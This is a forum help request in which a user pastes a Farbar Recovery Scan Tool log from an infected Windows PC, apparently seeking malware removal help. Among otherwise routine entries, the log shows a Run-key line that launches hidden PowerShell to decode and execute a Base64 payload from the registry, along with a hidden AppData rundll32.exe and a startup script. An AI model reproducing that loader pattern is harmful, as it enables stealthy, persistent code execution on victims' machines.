
My computer has been infected [Closed]



#1
Dennis Kiptoo (New Member, 1 posts)

My computer is infected by malware and viruses that have led to the closure of my Upwork online account by the administrator. Upwork is an online freelancing platform where clients hire writers for their projects.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 03-05-2017 01
Ran by DENNIS M (administrator) on NON (05-05-2017 12:44:08)
Running from C:\Users\USER\Desktop
Loaded Profiles: DENNIS M (Available Profiles: DENNIS M)
Platform: Windows 8.1 Pro (X64) Language: English (United Kingdom)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\AESTSr64.exe
(Foxit Software Inc.) C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\stacsv64.exe
(AVAST Software s.r.o.) C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe
(Smadsoft) C:\Program Files (x86)\SMADAV\SMΔRTP.exe
(IDT, Inc.) C:\Program Files\SigmaTel\C-Major Audio\WDM\sttray64.exe
() C:\Program Files (x86)\Upwork\upwork.exe
() C:\Program Files (x86)\WebcamMax\wcmmon.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
() C:\Program Files (x86)\Upwork\upwork.exe
() C:\Program Files (x86)\Upwork\upwork.exe
(Creative Technology Ltd.) C:\Windows\OEM02Mon.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.5\GoogleCrashHandler64.exe
(Smadav Software) C:\Program Files (x86)\SMADAV\SmadavProtect32.exe
(Smadav Software) C:\Program Files (x86)\SMADAV\SmadavProtect64.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [213824 2017-05-05] (AVAST Software)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [SMΔRT-Protection] => C:\Program Files (x86)\Smadav\SMΔRTP.exe [1736704 2017-01-14] (Smadsoft)
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [CyberGhost] => "C:\Program Files\CyberGhost 6\CyberGhost.exe" /autostart /min
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [Upwork] => C:\Program Files (x86)\Upwork\upwork.exe [2227496 2017-03-22] ()
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [WebcamMaxAutoRun] => C:\Program Files (x86)\WebcamMax\wcmmon.exe [1038848 2011-07-17] ()
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27545048 2017-03-14] (Skype Technologies S.A.)
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Run: [{245CAE4C-B7DC-4752-B92F-63DC8D25D4FD}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\wKNjXxBOSrsVKip').XFXEEJHACAA)));
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer: [DisallowRun] 1
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [1] Mshta.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [2] powershell.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\Policies\Explorer\DisallowRun: [3] bitsadmin.exe
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: F - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {3095b6bd-de5e-11e6-826c-001e101ff262} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a8767a9-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a8767d2-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a876c3c-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {7a87767e-d7cb-11e6-8267-bf6ca37c8cc0} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {87768129-1e8e-11e7-82b0-001e101f9824} - "I:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488244-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488259-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {9f488288-2460-11e7-82b4-001e101f1966} - "F:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {b12ce2cb-f2e7-11e6-828b-ac9469c63d41} - "F:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {de97fe40-2cd4-11e7-82be-001e101fc8e2} - "I:\Auto.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {de980e8d-2cd4-11e7-82be-001e101fc8e2} - "I:\Auto.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f2c454ea-e7bf-11e6-8278-001e101f5f92} - "I:\AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f2c45c74-e7bf-11e6-8278-001e101f5f92} - "I:\Windows/AutoRun.exe"
HKU\S-1-5-21-1975919165-801266099-53085287-1001\...\MountPoints2: {f883703f-b67f-11e6-824f-d86e29ba0045} - "F:\LGAutoRun.exe"
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
Startup: C:\Users\USER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs [2017-04-05] ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-1975919165-801266099-53085287-1001] => 172.16.63.3:3128
Tcpip\..\Interfaces\{184075C4-2C8A-47A2-9E62-9B050AC455FE}: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{81B6590E-6D8F-436F-A5D6-5C5E2B0D4DAA}: [NameServer] 196.201.216.21 196.201.217.7
Tcpip\..\Interfaces\{9BC7269C-8318-4392-AE33-BA4A97141ADE}: [NameServer] 196.201.216.21 196.201.217.7
Tcpip\..\Interfaces\{EB8D0396-AB58-4921-9F28-5549F56295E6}: [NameServer] 196.201.217.7 196.201.216.21

Internet Explorer:
==================
HKU\S-1-5-21-1975919165-801266099-53085287-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2017-05-05] (AVAST Software)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)
BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2017-05-05] (AVAST Software)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)

FireFox:
========
FF DefaultProfile: 70sdybgu.default
FF ProfilePath: C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default [2017-05-05]
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ftp", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ftp_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.socks", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.socks_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ssl", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> backup.ssl_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ftp", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ftp_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> http", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> http_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> share_proxy_settings", true
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> socks", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> socks_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ssl", "172.16.63.3"
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> ssl_port", 3128
FF NetworkProxy: Mozilla\Firefox\Profiles\70sdybgu.default -> type", 0
FF Extension: (Grammarly for Firefox) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-05-04]
FF Extension: (Simple YouTube to MP3/MP4 Converter and Downloader) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-01-23]
FF Extension: (Youtube Downloader - 4K Download) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-01-14]
FF Extension: (1-Click YouTube Video Downloader) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\[email protected] [2017-01-14]
FF Extension: (Youtube Best Video Downloader 2) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\{170503FA-3349-4F17-BC86-001888A5C8E2}.xpi [2017-04-10]
FF Extension: (Copy As Plain Text) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\{1a5dabbd-0e74-41da-b532-a364bb552cab}.xpi [2017-01-30]
FF Extension: (Download YouTube Videos as MP4) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\Extensions\{b9bfaf1c-a63f-47cd-8b9a-29526ced9060}.xpi [2017-02-18]
FF Extension: (Shield Recipe Client) - C:\Users\USER\AppData\Roaming\Mozilla\Firefox\Profiles\70sdybgu.default\features\{70a68181-2263-4af4-847f-b2a1a5404527}\[email protected] [2017-05-01]
FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll [2016-11-27] ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2016-08-09] (Foxit Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-28] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2012-10-01] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2014-12-03] (Adobe Systems Inc.)

Chrome:
=======
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default [2017-05-04]
CHR Extension: (Google Docs) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-01-11]
CHR Extension: (Google Drive) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-01-11]
CHR Extension: (YouTube) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-11]
CHR Extension: (Google Docs Offline) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-01-11]
CHR Extension: (Grammarly for Chrome) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbfnbcaeplbcioakkpcpgfkobkghlhen [2017-04-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-14]
CHR Extension: (Gmail) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-01-11]
CHR Extension: (Chrome Media Router) - C:\Users\USER\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-10]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AESTFilters; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\AESTSr64.exe [86016 2007-09-20] (Andrea Electronics Corporation)
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [7346208 2017-05-05] (AVAST Software s.r.o.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [263304 2017-05-05] (AVAST Software)
R2 FoxitReaderService; C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe [1659592 2016-10-13] (Foxit Software Inc.)
S3 ShareItSvc; C:\Program Files (x86)\SHAREit\SHAREit\Shareit.Service.exe [33224 2016-04-15] (SHAREit Technologies Co.Ltd)
R2 STacSV; C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_295b5b4710f6d77b\STacSV64.exe [122880 2008-02-15] (IDT, Inc.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [346872 2013-08-22] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23840 2013-08-22] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [311808 2017-05-05] (AVAST Software s.r.o.)
R0 aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [190256 2017-05-05] (AVAST Software s.r.o.)
R0 aswblog; C:\Windows\system32\drivers\aswbloga.sys [334576 2017-05-05] (AVAST Software s.r.o.)
R0 aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [49016 2017-05-05] (AVAST Software s.r.o.)
S3 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [38296 2017-05-05] (AVAST Software)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [32600 2017-05-05] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [128648 2017-05-05] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [101152 2017-05-05] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [75704 2017-05-05] (AVAST Software)
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1007160 2017-05-05] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [569192 2017-05-05] (AVAST Software)
R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [158368 2017-05-05] (AVAST Software)
R0 aswVmm; C:\Windows\system32\drivers\aswVmm.sys [339696 2017-05-05] (AVAST Software)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63al.sys [5170176 2013-07-01] (Broadcom Corporation)
S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R3 ewusbnet; C:\Windows\system32\DRIVERS\ewusbnet.sys [246224 2009-12-07] (Huawei Technologies Co., Ltd.)
R3 hwusbdev; C:\Windows\system32\DRIVERS\ewusbdev.sys [114304 2009-10-12] (Huawei Technologies Co., Ltd.)
R3 OEM02Dev; C:\Windows\system32\DRIVERS\OEM02Dev.sys [266624 2007-10-10] (Creative Technology Ltd.)
R3 OEM02Vfx; C:\Windows\system32\DRIVERS\OEM02Vfx.sys [12288 2007-03-05] (EyePower Games Pte. Ltd.)
R2 risdptsk; C:\Windows\system32\DRIVERS\risdsn64.sys [76288 2009-09-24] (REDC)
S3 tap0901; C:\Windows\system32\DRIVERS\tap0901.sys [27136 2016-04-21] (The OpenVPN Project) [File not signed]
S3 VMSMP; C:\Windows\system32\DRIVERS\vmswitch.sys [688640 2013-08-22] (Microsoft Corporation)
S3 VMSP; C:\Windows\system32\DRIVERS\vmswitch.sys [688640 2013-08-22] (Microsoft Corporation)
R2 WCMVCAM; C:\Windows\system32\DRIVERS\wcmvcam64.sys [1071032 2012-04-16] (Windows ® Win 7 DDK provider)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [34760 2013-08-22] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [265056 2013-08-22] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [124256 2013-08-22] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-05-05 12:37 - 2017-05-05 12:43 - 00023145 _____ C:\Users\USER\Desktop\Addition.txt
2017-05-05 12:36 - 2017-05-05 12:44 - 00019388 _____ C:\Users\USER\Desktop\FRST.txt
2017-05-05 12:35 - 2017-05-05 12:44 - 00000000 ____D C:\FRST
2017-05-05 12:32 - 2017-05-05 12:31 - 02428928 _____ (Farbar) C:\Users\USER\Desktop\FRST64.exe
2017-05-05 12:30 - 2017-05-05 12:31 - 02428928 _____ (Farbar) C:\Users\USER\Downloads\FRST64.exe
2017-05-05 11:35 - 2017-05-05 11:35 - 00003882 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1493973343
2017-05-05 11:35 - 2017-05-05 11:35 - 00001059 _____ C:\Users\Public\Desktop\Avast SafeZone Browser.lnk
2017-05-05 11:35 - 2017-05-05 11:35 - 00001059 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2017-05-05 11:34 - 2017-05-05 11:34 - 00032600 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw722D.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw7048.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6DD6.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6C10.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw6817.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw65F3.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw641D.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw612E.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw5DC2.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw590E.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw54C8.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw51C9.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4F18.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4C78.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw4979.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw46F7.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw40FB.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw3DBE.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw3B3C.tmp
2017-05-05 10:34 - 2017-05-05 10:34 - 00000000 _____ C:\Windows\system32\Drivers\asw36A7.tmp
2017-05-05 10:06 - 2017-05-05 10:06 - 00000000 ____D C:\ProgramData\SWCUTemp
2017-05-05 10:03 - 2017-05-05 10:03 - 00000000 ____D C:\Users\USER\AppData\Roaming\AVAST Software
2017-05-05 09:56 - 2017-05-05 11:12 - 00000000 ____D C:\Program Files\Common Files\AV
2017-05-05 09:55 - 2017-05-05 11:22 - 00004172 _____ C:\Windows\System32\Tasks\Avast Emergency Update
2017-05-05 09:55 - 2017-05-05 09:54 - 00569192 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00339696 _____ (AVAST Software) C:\Windows\system32\Drivers\aswVmm.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00158368 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00128648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00101152 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00075704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRvrt.sys
2017-05-05 09:55 - 2017-05-05 09:54 - 00038296 _____ (AVAST Software) C:\Windows\system32\Drivers\aswHwid.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 01007160 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00334576 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbloga.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00311808 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsdrivera.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00190256 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbidsha.sys
2017-05-05 09:55 - 2017-05-05 09:53 - 00049016 _____ (AVAST Software s.r.o.) C:\Windows\system32\Drivers\aswbuniva.sys
2017-05-05 09:54 - 2017-05-05 09:54 - 00992960 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2017-05-05 09:54 - 2017-05-05 09:54 - 00921280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2017-05-05 09:54 - 2017-05-05 09:54 - 00400456 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2017-05-05 09:42 - 2017-05-05 11:34 - 00000000 ____D C:\Program Files\AVAST Software
2017-05-05 09:40 - 2017-05-05 11:34 - 00000000 ____D C:\ProgramData\AVAST Software
2017-05-05 09:37 - 2017-05-05 09:38 - 06919904 _____ (AVAST Software) C:\Users\USER\Downloads\avast_free_antivirus_setup_online.exe
2017-05-05 09:37 - 2017-05-05 09:38 - 06919904 _____ (AVAST Software) C:\Users\Public\Desktop\avast_free_antivirus_setup_online.exe
2017-05-04 11:34 - 2017-05-04 11:34 - 00000000 ____D C:\Users\USER\Desktop\New folder
2017-05-02 19:32 - 2017-05-02 19:32 - 00013188 ____H C:\Users\USER\Documents\~WRL0251.tmp
2017-04-28 12:01 - 2017-04-28 12:01 - 00002432 _____ C:\Users\USER\Desktop\Grammarly.lnk
2017-04-28 12:01 - 2017-04-28 12:01 - 00000000 ____D C:\Users\USER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Grammarly
2017-04-28 12:00 - 2017-04-28 12:02 - 00000000 ____D C:\Users\USER\AppData\Local\GrammarlyForWindows
2017-04-28 11:38 - 2017-04-28 11:52 - 48679480 _____ (Grammarly) C:\Users\USER\Downloads\GrammarlySetup.exe
2017-04-25 19:58 - 2017-04-25 19:58 - 00199010 __RSH C:\Users\USER\AppData\Roaming\rundll32.exe
2017-04-24 16:26 - 2017-04-24 16:26 - 00000000 ____D C:\Users\USER\Desktop\certs
2017-04-24 16:05 - 2017-05-03 15:55 - 00000000 __SHD C:\[Smad-Cage]
2017-04-24 16:05 - 2017-04-28 15:16 - 00000000 ____D C:\Program Files (x86)\SMADAV
2017-04-24 16:05 - 2017-04-24 16:05 - 00003162 _____ C:\Windows\System32\Tasks\smadav
2017-04-24 16:05 - 2017-04-24 16:05 - 00001080 _____ C:\Users\Public\Desktop\SMADΔV.lnk
2017-04-24 16:05 - 2017-04-24 16:05 - 00000000 ____D C:\Users\USER\AppData\Roaming\Smadav
2017-04-24 16:05 - 2017-04-24 16:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SMADAV Antivirus
2017-04-24 16:03 - 2017-04-24 16:03 - 01500777 _____ (Smadsoft ) C:\Users\USER\Downloads\smadav2017.exe
